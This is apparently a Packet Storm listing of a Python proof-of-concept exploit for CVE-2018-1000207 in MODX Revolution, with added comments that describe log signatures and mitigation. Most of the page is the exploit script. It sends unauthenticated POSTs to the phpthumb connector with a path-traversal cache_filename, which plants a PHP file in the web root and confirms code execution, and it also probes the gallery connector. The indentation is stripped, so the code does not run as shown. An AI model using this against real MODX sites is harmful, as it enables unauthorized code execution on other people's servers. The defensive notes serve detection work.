
Modx Revolution Remote Code Execution

2018-07-1800:00:00
Vitalii Rudnykh
packetstormsecurity.com

0.624 Medium

EPSS

Percentile

97.5%

`# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution  
# Date: 2018-07-13  
# Exploit Author: Vitalii Rudnykh  
# Vendor Homepage: https://modx.com/  
# Version: <= 2.6.4  
# CVE : CVE-2018-1000207  
  
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
# Proof-of-concept probe for CVE-2018-1000207 (MODX Revolution, header says <= 2.6.4).  
# NOTE(review): the page rendering has dropped every level of indentation, so this  
# listing is not runnable as pasted; the try/if/else structure below is inferred  
# from the keywords, not from column position.  
#  
# What a defender should take from this script (all of it visible in the code below):  
#   - two unauthenticated endpoints are probed: /connectors/system/phpthumb.php and  
#     /assets/components/gallery/connector.php;  
#   - the first probe POSTs a phpThumb-style form with useRawIMoutput=1, an  
#     IMresizedData body containing PHP, and a cache_filename that starts with '../../';  
#   - success is confirmed by fetching payload.php from the site and comparing the body  
#     to a fixed digest string.  
# Web-server access logs showing POSTs to those two paths with IMresizedData /  
# cache_filename / useRawIMoutput parameters, and any payload.php appearing under the  
# document root, are the observable artifacts. Mitigation: move MODX past the affected  
# range named in the header and consider restricting direct HTTP access to connector  
# scripts that do not need to be reachable anonymously.  
import sys  
import os  
import requests  
from colorama import init, Fore, Style  
# Whole interactive session is wrapped so Ctrl-C falls through to the handler at the end.  
try:  
# colorama: enables ANSI colour handling for the Fore/Style prints below.  
init()  
  
# Clear the terminal; the command string is fixed (no user input), so os.system is  
# not an injection point here.  
def cls() -> None:  
os.system('cls' if os.name == 'nt' else 'clear')  
  
cls()  
  
print(Fore.BLUE +  
'################################################################')  
print(Fore.CYAN +  
'# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')  
print('# by Vitalii Rudnykh')  
print('# Thanks by AgelNash')  
print('# https://github.com/a2u/CVE-2018-1000207/')  
print(Fore.BLUE +  
'################################################################')  
print('Provided only for educational or information purposes')  
print(Style.RESET_ALL)  
# Base URL is taken verbatim from the operator; it is concatenated with the paths  
# below without any validation or normalisation.  
target = input('Enter target url (example: http(s)://domain.tld/): ')  
  
# TLS certificate verification stays on for every request.  
verify = True  
# PHP marker the PoC tries to plant: prints a digest and then unlinks its own file,  
# so on a vulnerable host the artifact removes itself after the first fetch — a  
# forensic review should rely on request logs rather than on finding the file.  
code = '<?php echo md5(\'a2u\'); unlink($_SERVER[\'SCRIPT_FILENAME\']);?>'  
  
# Probe 1: presence check for the system phpthumb connector. Any non-404 status  
# (including 403/500) is treated as "found".  
if requests.get(  
target + '/connectors/system/phpthumb.php',  
verify=verify).status_code != 404:  
print(Fore.GREEN + '/connectors/system/phpthumb.php - found')  
url = target + '/connectors/system/phpthumb.php'  
# Form fields of the first request. The PoC relies on the connector writing  
# IMresizedData to cache_filename when useRawIMoutput is set (inferred from the  
# field names; see the upstream advisory for the mechanism). The '../../' prefix in  
# cache_filename is the path-traversal component and is the clearest log signature.  
payload = {  
'ctx': 'web',  
'cache_filename': '../../payload.php',  
'useRawIMoutput': '1',  
'src': '.',  
'IMresizedData': code,  
'config_prefer_imagemagick': '0'  
}  
  
r = requests.post(url, data=payload, verify=verify)  
# Verdict: fetch the planted file and compare the body to the expected digest  
# (presumably md5('a2u') as emitted by the PHP above).  
check = requests.get(target + 'payload.php', verify=verify)  
if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d':  
print(Fore.GREEN + 'Exploitable!\n')  
else:  
print(Fore.RED + 'Not exploitable!\n')  
else:  
print(Fore.RED + 'phpthumb.php - not found')  
  
# Probe 2: the Gallery extra's connector. This one is non-destructive: it only asks  
# the endpoint to echo the literal 'Ok' back and inspects the response body.  
if requests.get(  
target + '/assets/components/gallery/connector.php',  
verify=verify).status_code != 404:  
print(Fore.GREEN + '/assets/components/gallery/connector.php - found')  
url = target + '/assets/components/gallery/connector.php'  
  
payload = {  
'action': 'web/phpthumb',  
'f': 'php',  
'useRawIMoutput': '1',  
'IMresizedData': 'Ok',  
'config_prefer_imagemagick': '0'  
}  
r = requests.post(url, data=payload, verify=verify)  
# A body of exactly 'Ok' means the supplied IMresizedData was returned verbatim.  
if r.text == 'Ok':  
print(Fore.GREEN + 'Exploitable!\n')  
else:  
print(Fore.RED + 'Not exploitable!\n')  
  
else:  
print(  
Fore.RED + '/assets/components/gallery/connector.php - not found')  
  
# Ctrl-C just clears the screen; any requests exception propagates uncaught.  
# `sys` is imported but never used in this script.  
except KeyboardInterrupt:  
cls()  
  
`
